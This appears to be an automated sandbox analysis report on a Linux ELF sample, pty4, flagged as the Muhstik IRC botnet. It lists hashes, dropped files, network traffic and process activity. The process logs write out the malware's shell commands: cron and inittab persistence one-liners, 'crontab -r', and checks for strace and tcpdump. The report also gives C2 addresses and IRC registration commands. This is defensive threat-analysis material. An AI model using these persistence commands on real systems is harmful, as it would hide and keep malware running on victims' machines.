SHA-512:	88BBCD7A72A8869652D7BEC1C0262B6896B9A5C9AFFB8AD2A78BAF5C90079D5B01AECD2DFCC7F13010FBCC8C4B73A097822C804640493D197319E008D1C00228
Malicious:	false
Reputation:	low
Preview:	0:2345:respawn:/var/run/pty4.

/run/lock/pty4 Download File
Process:	/usr/bin/cp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	44884
Entropy (8bit):	7.871246036237381
Encrypted:	false
SSDEEP:	768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p
MD5:	7B4F1C79F1EDCB6B36A92DEBD5A81B96
SHA1:	0193F962CF141AFD8BE8D5D252AC7C2511138860
SHA-256:	601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6
SHA-512:	D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 44%
Reputation:	low
Preview:	.ELF....................p...4...........4. ...(....................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td...............H.45.......I......U..S.......?E...x...[]......$..+....=`....t...o..5..............u........t.+.h..........!.}o.8..S..&$U*T....w.Z..D.;.Rj.hd-u.g@.~......_.;.b......1.....^....PTRhx\|@....QVhO..d.........E.F..v....6.U..............j..%>.k..H.............;.}..~..}....JW......g..W.....1......]......E.%.zo........3..R......g.....1..y......z...^T}1.]...)....d..H....Q6...P%C...U2T..P%C. U2T.$(%C..,02T.P48C..U<@,..%U.D..... +...e...;..[]M.%$.>P.1T.@<P.PeC8.4.U2T0,P%C.(U2T.$ %C....2T.P..C..U....P%.P.Y$.MEU..X.M$.}.P~....B.`P......l....-..y..........;=u_.M.o...]...4.e.QS....PY.zEu3[........n.v..............=.>......&.u..;k...($.?~.f..o..............!..}..5F.....a....T\U5"d..#........aa.V.,&......G.1H..X.~.7..Bq..jH.......m..,..

/run/pty4 Download File
Process:	/usr/bin/cp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	44884
Entropy (8bit):	7.871246036237381
Encrypted:	false
SSDEEP:	768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p
MD5:	7B4F1C79F1EDCB6B36A92DEBD5A81B96
SHA1:	0193F962CF141AFD8BE8D5D252AC7C2511138860
SHA-256:	601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6
SHA-512:	D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 44%
Reputation:	low
Preview:	.ELF....................p...4...........4. ...(....................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td...............H.45.......I......U..S.......?E...x...[]......$..+....=`....t...o..5..............u........t.+.h..........!.}o.8..S..&$U*T....w.Z..D.;.Rj.hd-u.g@.~......_.;.b......1.....^....PTRhx\|@....QVhO..d.........E.F..v....6.U..............j..%>.k..H.............;.}..~..}....JW......g..W.....1......]......E.%.zo........3..R......g.....1..y......z...^T}1.]...)....d..H....Q6...P%C...U2T..P%C. U2T.$(%C..,02T.P48C..U<@,..%U.D..... +...e...;..[]M.%$.>P.1T.@<P.PeC8.4.U2T0,P%C.(U2T.$ %C....2T.P..C..U....P%.P.Y$.MEU..X.M$.}.P~....B.`P......l....-..y..........;=u_.M.o...]...4.e.QS....PY.zEu3[........n.v..............=.>......&.u..;k...($.?~.f..o..............!..}..5F.....a....T\U5"d..#........aa.V.,&......G.1H..X.~.7..Bq..jH.......m..,..

/var/spool/cron/crontabs/tmp.EDmAaQ Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	387
Entropy (8bit):	4.8972080073755855
Encrypted:	false
SSDEEP:	12:8QjHig8pXVDeHLU9YumqzKMmq16mq05mqQY:8+2DALUqPqIq5q9qf
MD5:	0AEEA9C0CF1E605D1C32C770116811FA
SHA1:	2DB529A7F9B104A2D588DBD01309EA1173963B9D
SHA-256:	3AD0DF9C8F1EE0B623BD038808DFCA647D05878956C71766B24DCE153A0C2A13
SHA-512:	9267EC2B2A1F4FF3BF15CDAF4C4CD161D321883BBBED8F6EE92ECBB3D5571AB2A38F04D8E8811541CC6E8872A97DD5A3F6B915D5E786AB2BDCCBBC354496A12F
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:26:57 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty4 > /dev/null 2>&1 &.* * * * * /dev/shm/pty4 > /dev/null 2>&1 &.* * * * * /var/tmp/pty4 > /dev/null 2>&1 &.* * * * * /var/lock/pty4 > /dev/null 2>&1 &.* * * * * /var/run/pty4 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.X7EnDn Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.119840870160048
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQL/ZdGMQ5UYLtCFt39YBC0AgFz:8QjHig81deHLU9YuY
MD5:	F27B5E9C1AD82B55B346A8CAC385FA8C
SHA1:	D525DDB3972D3589F4F03154DC839799F332D157
SHA-256:	EC12A6E3E3E41E379EE2715C9BFB8BF1FDF7E2D8427D15FB7012442C9CA80464
SHA-512:	B5824E77F18E936D58097FE46D422ADE8777DA458808C31F579C93F06D3D3208B07848F8463C49C68F93F5CEC46402EF508518C830E538CDCA3021A65D878908
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:26:53 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty4 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.qptud8 Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.077584953913084
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgFz:8QjHig8heHLU9YumqzKMY
MD5:	C0FB58CBA6DD21C6860D1C23673EB946
SHA1:	3F14C66521E981207DE24838D91AB228D91EA30C
SHA-256:	0917CC44A428CE6C88894AC23565DC4DB23CE7C92D157116EF8C26B8750DB12F
SHA-512:	3038502C39EF45F0126E0B280E0F6DBB8EC732989A448E8E217EF07F8448FD25A3AE5EB23EBD0DB7A7D0F8A871E8D71FA55BC50015D9BC3B357C7AA445C9AC96
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:26:55 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty4 > /dev/null 2>&1 &.* * * * * /dev/shm/pty4 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.sabPpE Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.01078377746558
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIajUa:8QjHig8heHLU9YumqzKMmq16Y
MD5:	C0ADE17573AD8481FDC7E1F42CD4BD33
SHA1:	9C697B102CCE78F6605515A2F8EA3C26FD960457
SHA-256:	A560BE928DB6B7BD572FB8CC31C04E33A72B833827313F6AC01C3A5FB2D6A4F3
SHA-512:	E951E5C9391D0F9C3B22EDBF5035F6285AFD8EB47FC2885D5CD2985A0FE785D254C520BE443F7263308B6C5A1FBFE6F43FA65EB0996916EB219856CEC8F201E9
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:26:55 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty4 > /dev/null 2>&1 &.* * * * * /dev/shm/pty4 > /dev/null 2>&1 &.* * * * * /var/tmp/pty4 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.ySVvsi Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	4.959384391149962
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQL/lXVX/GMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIF:8QjHig8pXVDeHLU9YumqzKMmq16mq05Y
MD5:	F5AE8DD3B579745556ECFDCF7BE4139C
SHA1:	820F1CF68D965E66428285BFF491AD4B3CE59780
SHA-256:	94A9BD464AAFC4BD4FE1C510BA9886E7647F4AFF3C9F7D7329A4AE3A4F1BEE74
SHA-512:	3E3215B0477376062F31DE72FBDFE9D9BFA6387E4ADFA41BF54B79997CC1CE6FBDE96717B151BBCF3BB9C488704E916C5EE8B64AE0AF56B6B1EB51E4C25EF955
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:26:57 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty4 > /dev/null 2>&1 &.* * * * * /dev/shm/pty4 > /dev/null 2>&1 &.* * * * * /var/tmp/pty4 > /dev/null 2>&1 &.* * * * * /var/lock/pty4 > /dev/null 2>&1 &.

/var/tmp/pty4 Download File
Process:	/usr/bin/cp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	44884
Entropy (8bit):	7.871246036237381
Encrypted:	false
SSDEEP:	768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p
MD5:	7B4F1C79F1EDCB6B36A92DEBD5A81B96
SHA1:	0193F962CF141AFD8BE8D5D252AC7C2511138860
SHA-256:	601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6
SHA-512:	D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 44%
Reputation:	low
Preview:	.ELF....................p...4...........4. ...(....................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td...............H.45.......I......U..S.......?E...x...[]......$..+....=`....t...o..5..............u........t.+.h..........!.}o.8..S..&$U*T....w.Z..D.;.Rj.hd-u.g@.~......_.;.b......1.....^....PTRhx\|@....QVhO..d.........E.F..v....6.U..............j..%>.k..H.............;.}..~..}....JW......g..W.....1......]......E.%.zo........3..R......g.....1..y......z...^T}1.]...)....d..H....Q6...P%C...U2T..P%C. U2T.$(%C..,02T.P48C..U<@,..%U.D..... +...e...;..[]M.%$.>P.1T.@<P.PeC8.4.U2T0,P%C.(U2T.$ %C....2T.P..C..U....P%.P.Y$.MEU..X.M$.}.P~....B.`P......l....-..y..........;=u_.M.o...]...4.e.QS....PY.zEu3[........n.v..............=.>......&.u..;k...($.?~.f..o..............!..}..5F.....a....T\U5"d..#........aa.V.,&......G.1H..X.~.7..Bq..jH.......m..,..

Static File Info

General
File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Entropy (8bit):	7.871246036237381
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	pty4
File size:	44884
MD5:	7b4f1c79f1edcb6b36a92debd5a81b96
SHA1:	0193f962cf141afd8be8d5d252ac7c2511138860
SHA256:	601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
SHA512:	d4cdc2897a6e22e1f8a246bfdbac358debe8e48da4b74e6b0abd45f3eed8b0ec44ea50c2344c84325cae13e70019023acd99872c772b5f6f0bcef67a6cafa1cf
SSDEEP:	768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p
File Content Preview:	.ELF....................p...4...........4. ...(......................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td................H.45....

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0xc0b670
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0xc01000	0xc01000	0xadec	0xadec	4.4178	0x5	R E	0x1000
LOAD	0x7e4	0x80617e4	0x80617e4	0x0	0x0	0.0000	0x6	RW	0x1000

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/23/21-11:26:58.030802	TCP	2034743	ET TROJAN ELF/Muhstik Botnet CnC Activity	48714	8080	192.168.2.23	156.67.220.165

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2021 11:26:53.253879070 CET	42836	443	192.168.2.23	91.189.91.43
Dec 23, 2021 11:26:53.765599012 CET	42516	80	192.168.2.23	109.202.202.202
Dec 23, 2021 11:26:55.993947029 CET	48042	8080	192.168.2.23	198.8.91.14
Dec 23, 2021 11:26:56.115650892 CET	8080	48042	198.8.91.14	192.168.2.23
Dec 23, 2021 11:26:56.994074106 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:57.270119905 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:57.271761894 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.030802011 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.307034969 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:58.307251930 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:58.307327986 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.310981035 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.587162018 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:58.587241888 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.588644028 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:58.904227972 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:58.904376984 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:26:59.180529118 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:59.180576086 CET	8080	48714	156.67.220.165	192.168.2.23
Dec 23, 2021 11:26:59.181150913 CET	48714	8080	192.168.2.23	156.67.220.165
Dec 23, 2021 11:27:08.101514101 CET	43928	443	192.168.2.23	91.189.91.42
Dec 23, 2021 11:27:20.389602900 CET	42836	443	192.168.2.23	91.189.91.43
Dec 23, 2021 11:27:24.485449076 CET	42516	80	192.168.2.23	109.202.202.202
Dec 23, 2021 11:27:49.061294079 CET	43928	443	192.168.2.23	91.189.91.42
Dec 23, 2021 11:28:09.829783916 CET	777	48812	23.95.222.119	192.168.2.23
Dec 23, 2021 11:28:09.830014944 CET	48812	777	192.168.2.23	23.95.222.119

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2021 11:26:55.924426079 CET	47783	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:26:55.976707935 CET	53	47783	1.1.1.1	192.168.2.23
Dec 23, 2021 11:26:55.977072001 CET	47783	53	192.168.2.23	1.1.1.1
Dec 23, 2021 11:26:55.993489027 CET	53	47783	1.1.1.1	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 23, 2021 11:26:55.924426079 CET	192.168.2.23	1.1.1.1	0x2e6a	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 23, 2021 11:26:55.977072001 CET	192.168.2.23	1.1.1.1	0x2e6a	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 23, 2021 11:26:55.976707935 CET	1.1.1.1	192.168.2.23	0x2e6a	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 23, 2021 11:26:55.993489027 CET	1.1.1.1	192.168.2.23	0x2e6a	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)

IRC Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 23, 2021 11:26:58.030802011 CET	48714	8080	192.168.2.23	156.67.220.165	NICK i586\|LOG\|i\|0\|3843249\|galassia USER x01 localhost localhost :muhstik-11052018
Dec 23, 2021 11:26:58.904376984 CET	48714	8080	192.168.2.23	156.67.220.165	JOIN #log :8974 WHO i586\|LOG\|i\|0\|3843249\|galassia

System Behavior

Analysis Process: pty4 PID: 5218 Parent PID: 5115

General

Start time:	11:26:48
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	/tmp/pty4
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5219 Parent PID: 5218

General

Start time:	11:26:48
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5219 Parent PID: 5218

General

Start time:	11:26:48
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x strace > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5220 Parent PID: 5219

General

Start time:	11:26:48
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5220 Parent PID: 5219

General

Start time:	11:26:48
Start date:	23/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x strace
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty4 PID: 5221 Parent PID: 5218

General

Start time:	11:26:51
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5221 Parent PID: 5218

General

Start time:	11:26:51
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x tcpdump > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5222 Parent PID: 5221

General

Start time:	11:26:51
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5222 Parent PID: 5221

General

Start time:	11:26:51
Start date:	23/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x tcpdump
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty4 PID: 5225 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5227 Parent PID: 5225

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5227 Parent PID: 5225

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -r"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5235 Parent PID: 5227

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5235 Parent PID: 5227

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -r
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5226 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5229 Parent PID: 5226

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5229 Parent PID: 5226

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /tmp/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty4 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5232 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5232 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5233 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5233 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /tmp/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5234 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5234 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5238 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5240 Parent PID: 5238

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5240 Parent PID: 5238

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5239 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5239 Parent PID: 5229

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5228 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5228 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/tmp/pty4\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5230 Parent PID: 5228

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5230 Parent PID: 5228

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5231 Parent PID: 5228

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5231 Parent PID: 5228

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /tmp/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty4 PID: 5237 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5237 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/tmp/pty4\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty4 PID: 5241 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5241 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5242 Parent PID: 5241

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5242 Parent PID: 5241

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty4 PID: 5243 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5243 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5244 Parent PID: 5243

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

